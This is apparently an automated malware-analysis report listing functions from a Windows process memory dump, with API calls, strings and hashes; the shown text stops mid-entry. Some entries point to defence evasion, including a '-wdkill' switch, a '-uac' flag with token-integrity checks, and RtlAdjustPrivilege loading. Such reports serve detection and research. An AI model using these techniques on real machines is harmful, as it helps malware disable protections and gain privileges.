Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$Deallocate__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 2266438879-1924342159
Opcode ID: e5fcf2fe69a4573278cf5c21032345c37ff6bc6378ad9ef2c1c31d8b494c46e0
Instruction ID: e3f6e4ed26c1171030c5f62641186f8f80774c7b3595355818da57d0c299be82
Opcode Fuzzy Hash: e5fcf2fe69a4573278cf5c21032345c37ff6bc6378ad9ef2c1c31d8b494c46e0
Instruction Fuzzy Hash: 77518870C05298DEDF54DBA9D8417EDBBF4AF55300F2080AEE519F7282DA781E44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004149A2, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 131COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004149A7
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,00000000,00000000), ref: 00414A2A
VerifyVersionInfoW.KERNEL32(?,00000002,00000000), ref: 00414A3B
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 00414A91
GetLastError.KERNEL32(?,?,00000000,00000000), ref: 00414A9E

Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F

new.LIBCMT ref: 00414ADD
new.LIBCMT ref: 00414AF6

Strings

yFA, xrefs: 004149BE
IKA, xrefs: 004149E1
iocp, xrefs: 00414AB9

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$CompletionConditionCreateErrorInfoLastMaskPortVerifyVersion
String ID: IKA$iocp$yFA
API String ID: 1196141489-2608038400
Opcode ID: 4986c1491a2db2f7b8d9f1aa5ba03b7600fcac1162b12af0b918ebf57e0b935a
Instruction ID: 1be28db19f12501b6fb4aff77f28c7ab733547099b558ec7f059dc77d5376b3d
Opcode Fuzzy Hash: 4986c1491a2db2f7b8d9f1aa5ba03b7600fcac1162b12af0b918ebf57e0b935a
Instruction Fuzzy Hash: EA51BCB1804384DFDB14CF69C88579EBFF4AF55310F1081AEE8489B392C3B88A44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0042A633, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 158windowCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0042A637

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 0042A642

Part of subcall function 0044E381: __EH_prolog.LIBCMT ref: 0044E386

Part of subcall function 00461060: __EH_prolog.LIBCMT ref: 00461065

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

GetLastError.KERNEL32 ref: 0042A777
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042A7A1

Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733

Strings

snY, xrefs: 0042A73E
7nY, xrefs: 0042A780
Messages, xrefs: 0042A764
0, xrefs: 0042A6AD
_nY, xrefs: 0042A6EC

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Deallocatestd::_$ErrorExceptionException@8LastMessageRaiseThrow
String ID: 0$7nY$Messages$_nY$snY
API String ID: 2333877577-357471530
Opcode ID: e212bc448a3b2b038eebb2e3258a7a51102f6a3691d3f2dbcd3de248953afd28
Instruction ID: 9da7b96ff621f32f9069ae91d5d81b3fab937ab502c573aa5ef8c35d28737e4a
Opcode Fuzzy Hash: e212bc448a3b2b038eebb2e3258a7a51102f6a3691d3f2dbcd3de248953afd28
Instruction Fuzzy Hash: E2518EB1D0025CAEEB20DFA5DC84BEEBBBDEB44304F14406AF504A7281CBB85E058B64

Uniqueness

Uniqueness Score: -1.00%

Function 00415033, Relevance: 15.2, APIs: 10, Instructions: 236COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00415038
EnterCriticalSection.KERNEL32(?,74B065A0,?,00000000), ref: 00415061
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 004150C3
SetLastError.KERNEL32(00000000,74B065A0,?,00000000), ref: 004150D5
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,?,?,00000000), ref: 004150ED
GetLastError.KERNEL32(?,00000000), ref: 004150F6
__ExceptionPtrCopy.LIBCPMT ref: 004151B2
__ExceptionPtrCopy.LIBCPMT ref: 004151C3
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00415241
GetLastError.KERNEL32(?,00000000), ref: 0041524B

Part of subcall function 00414F2A: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 00414F51
Part of subcall function 00414F2A: GetLastError.KERNEL32 ref: 00414F5B

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast$CompletionQueuedStatus$CopyCriticalExceptionPostSection$EnterH_prologLeave
String ID:
API String ID: 4011970719-0
Opcode ID: 55e090ddf1c9b92d45048a01d25a9e272ec8599fe88ab40c7b02e9ae99173a20
Instruction ID: 34897399caa75640775a5bbacf9fec6c5dd6c2ccf09fc9a0a4bf3d95f6a717ac
Opcode Fuzzy Hash: 55e090ddf1c9b92d45048a01d25a9e272ec8599fe88ab40c7b02e9ae99173a20
Instruction Fuzzy Hash: 59917971D00619DFCF15DFA4C840AEEBBB5FF88310B14846AE816EB241D7789A46CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004300A9, Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 365COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004300AD

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 004300B8

Part of subcall function 0044DE59: __EH_prolog.LIBCMT ref: 0044DE5E
Part of subcall function 0044DE59: new.LIBCMT ref: 0044DE84
Part of subcall function 0044DE59: GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 0044DEEB
Part of subcall function 0044DE59: GetProcAddress.KERNEL32(?,?), ref: 0044DF6C

GetCurrentProcess.KERNEL32(00020008,?,?,?,00000000), ref: 004300EA
OpenProcessToken.ADVAPI32(00000000,?,?,00000000), ref: 004300F1
GetTokenInformation.ADVAPI32(?,00000012(TokenIntegrityLevel),?,00000004,?,?,?,00000000), ref: 00430106
Wow64DisableWow64FsRedirection.KERNEL32(00000002,?,?,00000000), ref: 00430141

Part of subcall function 00461060: __EH_prolog.LIBCMT ref: 00461065

Part of subcall function 004317E2: __EH_prolog.LIBCMT ref: 004317E7

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Part of subcall function 00461060: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004610E6
Part of subcall function 00461060: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000), ref: 0046111C

Part of subcall function 004312CA: __EH_prolog.LIBCMT ref: 004312CF

Part of subcall function 00476C03: __EH_prolog.LIBCMT ref: 00476C08

Strings

-wdkill, xrefs: 004301BF
Open, xrefs: 004304C6

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ByteCharMultiProcessTokenWideWow64$AddressCurrentDeallocateDisableExceptionException@8HandleInformationModuleOpenProcRaiseRedirectionThrowstd::_
String ID: -wdkill$Open
API String ID: 1268642766-108266240
Opcode ID: 4ef5ba725993361614ed764dd50c27818f1b768f39420012fe73aa5529321e05
Instruction ID: 41ee8f846fb54aecf92d047f2ac0e9fdf6e396cd655f5395e0a14007bb8153d2
Opcode Fuzzy Hash: 4ef5ba725993361614ed764dd50c27818f1b768f39420012fe73aa5529321e05
Instruction Fuzzy Hash: 93D14B71D04248EEDB14EBA9CD92BEDBBB4AF65304F1041DEE406A7182DB781F44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004282BC, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 249COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004282C1
new.LIBCMT ref: 004282DF

Part of subcall function 004A4399: __EH_prolog.LIBCMT ref: 004A439E

Part of subcall function 004B1281: __EH_prolog.LIBCMT ref: 004B1286
Part of subcall function 004B1281: std::exception::exception.LIBCONCRT ref: 004B1345
Part of subcall function 004B1281: __CxxThrowException@8.LIBVCRUNTIME ref: 004B1372

Part of subcall function 004A4514: __EH_prolog.LIBCMT ref: 004A4519
Part of subcall function 004A4514: new.LIBCMT ref: 004A4566

Part of subcall function 004A4867: __EH_prolog.LIBCMT ref: 004A486C

_strlen.LIBCMT ref: 0042845C

Part of subcall function 00460E77: __EH_prolog.LIBCMT ref: 00460E7C

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Strings

allocator_, xrefs: 0042833F
{"xml":{"block":{, xrefs: 00428524
}}}, xrefs: 00428453, 00428464, 00428483, 004284B7
{"xml":{"block":[{, xrefs: 0042850E
}]}}, xrefs: 004284A1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$DeallocateException@8Throw_strlenstd::_std::exception::exception
String ID: allocator_${"xml":{"block":[{${"xml":{"block":{$}]}}$}}}
API String ID: 1519558710-3049038541
Opcode ID: 5939b42d2d2b44c701bf2ede9b0aa35e4033d59645f8472da0ac5a30ad4cb7f9
Instruction ID: 8e74e5dbd17faedd92233c1d650ba914d98a3c2b359c8518cf7fc787aec77e35
Opcode Fuzzy Hash: 5939b42d2d2b44c701bf2ede9b0aa35e4033d59645f8472da0ac5a30ad4cb7f9
Instruction Fuzzy Hash: 61A1E570E01248EEEF11EBA9D942BDDBBB0AF55304F50409EE50477282EBB81B44CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0042F8DA, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,00000001,00000003,00000000,00000003,00000080,00000000), ref: 0042F97A
GetFileSize.KERNEL32(00000000,00000000), ref: 0042F98E
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0042F9AA
_strstr.LIBCMT ref: 0042F9BB
_strstr.LIBCMT ref: 0042F9D8
_strstr.LIBCMT ref: 0042F9EF

Strings

1, xrefs: 0042FA1B
D, xrefs: 0042FB29

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: File_strstr$CreateReadSize
String ID: 1$D
API String ID: 508477285-1521562266
Opcode ID: 98a91ab802709f5f88ffdcb758c9595b95be036a8afdc4c7e2ef031a96c92214
Instruction ID: f1e8636acd394486ea041d19820bbd8fb296dd8af5b0d257679712306aeef603
Opcode Fuzzy Hash: 98a91ab802709f5f88ffdcb758c9595b95be036a8afdc4c7e2ef031a96c92214
Instruction Fuzzy Hash: A4616CB2505345AFE721DBB0DC89FDB77ACEB89310F00492DF645C2191E774A648CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0054D4B0, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0054D4B5
_strlen.LIBCMT ref: 0054D572

Part of subcall function 00526747: __EH_prolog.LIBCMT ref: 0052674C

Strings

Type name should contain only letters, digits, - and _, xrefs: 0054D611
cvRegisterType, xrefs: 0054D529, 0054D600, 0054D67A, 0054D6D4
Type name should start with a letter or _, xrefs: 0054D53A
(, xrefs: 0054D4CD
Invalid type info, xrefs: 0054D6E5
Some of required function pointers (is_instance, release, read or write) are NULL, xrefs: 0054D68B

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen
String ID: ($Invalid type info$Some of required function pointers (is_instance, release, read or write) are NULL$Type name should contain only letters, digits, - and _$Type name should start with a letter or _$cvRegisterType
API String ID: 1490583215-3333454738
Opcode ID: 04df3a7afce0991216eb495b987f1af19d2ece20d4bb6b7dc744d4d72a3e485a
Instruction ID: 95645daa29c1e11541bb8f57286c8cbbb84a8f79c9b96ede5d7eeefff689ba99
Opcode Fuzzy Hash: 04df3a7afce0991216eb495b987f1af19d2ece20d4bb6b7dc744d4d72a3e485a
Instruction Fuzzy Hash: 62610371D01348EECB10EF94D981BEEBFB4BF54308F64415AE205A7182EB785B4ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0044E030, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 145libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044E035
new.LIBCMT ref: 0044E05B
GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 0044E0C1
GetProcAddress.KERNEL32(?,?), ref: 0044E142
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0044E19C
GetProductInfo.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0044E1AE

Strings

q, xrefs: 0044E091
{, xrefs: 0044E0FE

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Info$AddressH_prologHandleModuleProcProductSystem
String ID: q${
API String ID: 1760484215-2622329447
Opcode ID: 2f56d29a8ef9a06369c99fc6e252e885842b0d6ec9905014f79c65e6560cc5cf
Instruction ID: 2018a9e3838fd97179f42bc47fbd35d40b294c3d07c84d0fda71dc35fd26f447
Opcode Fuzzy Hash: 2f56d29a8ef9a06369c99fc6e252e885842b0d6ec9905014f79c65e6560cc5cf
Instruction Fuzzy Hash: 60513971C0474CAEEB019FA9DC81AEEFBB9FF55300F10412EE948A7212EB745A858710

Uniqueness

Uniqueness Score: -1.00%

Function 004161F3, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004161F8
GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 0041622E
GetProcAddress.KERNEL32(00000000), ref: 00416235
GetLastError.KERNEL32 ref: 0041624A
EnterCriticalSection.KERNEL32(00000018,0000273D), ref: 004162C7
LeaveCriticalSection.KERNEL32(00000018,?,?,000003E3), ref: 004162F5

Strings

KERNEL32, xrefs: 00416229
CancelIoEx, xrefs: 00416224

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$AddressEnterErrorH_prologHandleLastLeaveModuleProc
String ID: CancelIoEx$KERNEL32
API String ID: 3905279128-434325024
Opcode ID: 369d6c3a43dcee6edc7e1e7c4f54f33cb79032d60b7f67d996bbbdc7e2ba924e
Instruction ID: a7006d18d8acdee5e0b967cd4137457068317b79715a05f2329568f27a806d5a
Opcode Fuzzy Hash: 369d6c3a43dcee6edc7e1e7c4f54f33cb79032d60b7f67d996bbbdc7e2ba924e
Instruction Fuzzy Hash: 9D31C271A002499FDF11EFA4C8816EEB7B5FF48324F15406EE855A7241CBB899428BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00432CC0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98libraryloaderCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00432CC4

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 00432CCF
LoadLibraryA.KERNEL32(ntdll.dll,00000000,RtlAdjustPrivilege,?,?,00000000), ref: 00432D09
GetProcAddress.KERNEL32(00000000), ref: 00432D16
GetModuleHandleA.KERNEL32(ntdll.dll,00000000,?,?,00000000), ref: 00432D84
GetProcAddress.KERNEL32(00000000), ref: 00432D8B

Strings

ntdll.dll, xrefs: 00432D04, 00432D7F
RtlAdjustPrivilege, xrefs: 00432CEC

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressProc$ExceptionException@8H_prologHandleLibraryLoadModuleRaiseThrow
String ID: RtlAdjustPrivilege$ntdll.dll
API String ID: 1958860538-64178277
Opcode ID: b679daa22566008a588b228a0f399ae62337a8b9c52c85f4b772e076711b2577
Instruction ID: 181ba8571e7ca69a2902c82104256214a52e939873d4e805e75b0ad3c802b7c0
Opcode Fuzzy Hash: b679daa22566008a588b228a0f399ae62337a8b9c52c85f4b772e076711b2577
Instruction Fuzzy Hash: A631B271D0024DAEEB009FEDCC816EEFBB9EF59304F10922AE505E2162EBB419458B50

Uniqueness

Uniqueness Score: -1.00%

Function 004226AE, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 52COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004226B3
__CxxThrowException@8.LIBVCRUNTIME ref: 004226D9

Strings

%(B, xrefs: 004226FC
ios_base::badbit set, xrefs: 004226E8
-J, xrefs: 00422742, 00422724, 004226F0
ios_base::failbit set, xrefs: 0042271C
-J, xrefs: 00422707
ios_base::eofbit set, xrefs: 0042273A

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception@8H_prologThrow
String ID: %(B$-J$-J$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3222999186-1624389419
Opcode ID: 321b7316f0767ef0116021abc2423ed97814d3a0d76f17a2fbc1baf0e6f94302
Instruction ID: aa09175c34796eb147eb1c34b455be395ae94e8227792fea42777a0b9671923f
Opcode Fuzzy Hash: 321b7316f0767ef0116021abc2423ed97814d3a0d76f17a2fbc1baf0e6f94302
Instruction Fuzzy Hash: 0311CEB1A40218BBDF00EB94DA56BEE7774AB40704F80415EE901BA1E2DBFD0940DB29

Uniqueness

Uniqueness Score: -1.00%

Function 004312CA, Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 373stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004312CF

Part of subcall function 00460CFB: __EH_prolog.LIBCMT ref: 00460D00

Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733

Part of subcall function 004B201B: __EH_prolog.LIBCMT ref: 004B2020
Part of subcall function 004B201B: _strlen.LIBCMT ref: 004B203A

Part of subcall function 004B20A2: __EH_prolog.LIBCMT ref: 004B20A7

Part of subcall function 004B1F44: __EH_prolog.LIBCMT ref: 004B1F49

lstrlenW.KERNEL32(?), ref: 00431738

Strings

pY, xrefs: 00431698
., xrefs: 004313F6
$, xrefs: 00431400
0, xrefs: 004313EC
dpY, xrefs: 004315E2

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Deallocate_strlenlstrlenstd::_
String ID: pY$$$.$0$dpY
API String ID: 1102430898-161294348
Opcode ID: 9862811509f9b95a003302a752e52a420db539789bbc8e063268ac9f4174cd37
Instruction ID: 2019e853b7ba3b3f6dace8cdb3938b96c2a69957cc0489f69eaab64d4fa91aeb
Opcode Fuzzy Hash: 9862811509f9b95a003302a752e52a420db539789bbc8e063268ac9f4174cd37
Instruction Fuzzy Hash: 40E19E70D04248EEDF10DFA9C945BEDBBB8AF59308F1040AEF405A7192DB785E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0043053B, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 360sleepCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0043053F

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 0043054A

Part of subcall function 0044E030: __EH_prolog.LIBCMT ref: 0044E035
Part of subcall function 0044E030: new.LIBCMT ref: 0044E05B
Part of subcall function 0044E030: GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 0044E0C1
Part of subcall function 0044E030: GetProcAddress.KERNEL32(?,?), ref: 0044E142

Wow64DisableWow64FsRedirection.KERNEL32(?,?,?,00000000), ref: 0043057E
GetCurrentProcessId.KERNEL32( -uac ,00000001,00000000,00000000,?,?,?,00000000), ref: 0043060C

Part of subcall function 00461060: __EH_prolog.LIBCMT ref: 00461065

Part of subcall function 004317E2: __EH_prolog.LIBCMT ref: 004317E7

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Part of subcall function 00461060: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004610E6
Part of subcall function 00461060: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000), ref: 0046111C

Part of subcall function 004312CA: __EH_prolog.LIBCMT ref: 004312CF

Part of subcall function 00476C03: __EH_prolog.LIBCMT ref: 00476C08

Sleep.KERNEL32(000007D0,00000001,00000000), ref: 00430956

Strings

-uac , xrefs: 004305FC
Open, xrefs: 00430934

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ByteCharMultiWideWow64$AddressCurrentDeallocateDisableExceptionException@8HandleModuleProcProcessRaiseRedirectionSleepThrowstd::_
String ID: -uac $Open
API String ID: 579798290-1568193000
Opcode ID: 4cc4d7b3d1995ddb75527250c26e08fec697e4dccedd86b72c17294fe0aba574
Instruction ID: bc9629f558fbc10ef8a2d00f0175091ec6b6f7cbbdd8330f476d59a52988737c
Opcode Fuzzy Hash: 4cc4d7b3d1995ddb75527250c26e08fec697e4dccedd86b72c17294fe0aba574
Instruction Fuzzy Hash: 08D13C71D04288EEDB14EBA9DD51BEDBBB4AF61308F1041DEE40667182DBB41F44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A040, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 224COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0041A044

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 0041A04F

Part of subcall function 0047DA23: __EH_prolog.LIBCMT ref: 0047DA28
Part of subcall function 0047DA23: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 0047DAD7
Part of subcall function 0047DA23: GetProcAddress.KERNEL32(00000000), ref: 0047DADE

Part of subcall function 00413FDC: std::_Throw_Cpp_error.LIBCPMT ref: 00413FE7

Strings

o, xrefs: 0041A0D4
I, xrefs: 0041A152
#, xrefs: 0041A0DB
Po#, xrefs: 0041A2EA, 0041A237, 0041A23A
Po#, xrefs: 0041A0F5

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
String ID: #$I$Po#$Po#$o
API String ID: 3644655947-2769149942
Opcode ID: 314aaf49a41efd81201e9ad3eb8245b13f04cc561557abd64dbc011021257361
Instruction ID: 686d0957ac0dc56bfbc0da5fcef495ae2bfa271e15074c82fe43ed19b16736fb
Opcode Fuzzy Hash: 314aaf49a41efd81201e9ad3eb8245b13f04cc561557abd64dbc011021257361
Instruction Fuzzy Hash: D181F671D0424CAEDB00DFE9D881BEDBBB8EF59304F20416EF515A7291EB781A84CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004BB5E0, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004BB5E5
std::exception::exception.LIBCONCRT ref: 004BB6CC
__CxxThrowException@8.LIBVCRUNTIME ref: 004BB6F9
std::exception::exception.LIBCONCRT ref: 004BB720

Part of subcall function 0040F2EC: ___std_exception_copy.LIBVCRUNTIME ref: 0040F313

Strings

expected >, xrefs: 004BB6C4
unexpected end of data, xrefs: 004BB71B
4s, xrefs: 004BB6F0, 004BB6F8

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::exception::exception$Exception@8H_prologThrow___std_exception_copy
String ID: 4s$expected >$unexpected end of data
API String ID: 4209301069-991829502
Opcode ID: 8b1d3957207f505c324ce79e6a95fd0670fcf4cf1a6edb5b0f48bcd14e6a9081
Instruction ID: 0b2fe0a887f8a89c18e3e9c4816864780de2b68ed30e08345f6c81ac900129bf
Opcode Fuzzy Hash: 8b1d3957207f505c324ce79e6a95fd0670fcf4cf1a6edb5b0f48bcd14e6a9081
Instruction Fuzzy Hash: 6141C1709042499FDB10DF69C050AEDBFF5EF19314F24409EE495AB382C7B99E02CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004309C5, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 110libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004309CA
new.LIBCMT ref: 004309F0
GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 00430A5B
GetProcAddress.KERNEL32(00000000,00000000), ref: 00430A79
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00430AC9
GetProductInfo.KERNEL32(00000001,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00430ADB

Strings

RtlGetVersion, xrefs: 00430A63

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Info$AddressH_prologHandleModuleProcProductSystem
String ID: RtlGetVersion
API String ID: 1760484215-3026520245
Opcode ID: a4ad8f4ab691a92ea1e724edc2c889b316426821bedfcb2fae30abbcb81e7894
Instruction ID: 6404758461dc82cfd43961a36794971adb8017d390324696ef4079359887610b
Opcode Fuzzy Hash: a4ad8f4ab691a92ea1e724edc2c889b316426821bedfcb2fae30abbcb81e7894
Instruction Fuzzy Hash: 9531D571D00348ABDB11EFF99C456EEBBB9FF69304F10516EE905A7202E7385E448B54

Uniqueness

Uniqueness Score: -1.00%

Function 00414512, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414517
std::exception::exception.LIBCONCRT ref: 00414537

Part of subcall function 0040F2EC: ___std_exception_copy.LIBVCRUNTIME ref: 0040F313

Part of subcall function 0041CAA1: __EH_prolog.LIBCMT ref: 0041CAA6
Part of subcall function 0041CAA1: __CxxThrowException@8.LIBVCRUNTIME ref: 0041CAF4

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000064,00000000,00000001), ref: 00414568
LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,00000064,00000000), ref: 004145B0
std::exception::exception.LIBCONCRT ref: 004145D1

Strings

Service already exists., xrefs: 004145C9
Invalid service owner., xrefs: 0041452F

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalH_prologSectionstd::exception::exception$EnterException@8LeaveThrow___std_exception_copy
String ID: Invalid service owner.$Service already exists.
API String ID: 479834926-4115445021
Opcode ID: c426ae453c5316bb45af9c006bb095a1d0b55481944eb36e95d83558caf1e521
Instruction ID: 5e1c88f37677eba64b8ed75703ef542653ff074ccc6753e62f2279e524c2587a
Opcode Fuzzy Hash: c426ae453c5316bb45af9c006bb095a1d0b55481944eb36e95d83558caf1e521
Instruction Fuzzy Hash: 81219E70801208EFDB10DF94C5856DEBBF1FF14318F2085ADE445AB282C775AE49CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00574E11, Relevance: 12.2, APIs: 8, Instructions: 208COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00574E16
new.LIBCMT ref: 00574E5C

Part of subcall function 00575AFF: __EH_prolog.LIBCMT ref: 00575B04
Part of subcall function 00575AFF: _strlen.LIBCMT ref: 00575B3B

new.LIBCMT ref: 00574EA6
new.LIBCMT ref: 00574EFA
new.LIBCMT ref: 00574F44
new.LIBCMT ref: 00574F93
new.LIBCMT ref: 00574FDD

Part of subcall function 00689E2F: Concurrency::cancel_current_task.LIBCPMT ref: 00689E47

Part of subcall function 005788C9: __EH_prolog.LIBCMT ref: 005788CE
Part of subcall function 005788C9: _strlen.LIBCMT ref: 005788F0

new.LIBCMT ref: 00575029

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen$Concurrency::cancel_current_task
String ID:
API String ID: 194979272-0
Opcode ID: d348dd2e255e7a04975d9478a94b6ef38bd829f02040cb2e86af2ca7f9850373
Instruction ID: ec79fdd97f30282d325d4aa532c5880f809d8fb84260d4748b0d03db5f89a7f5
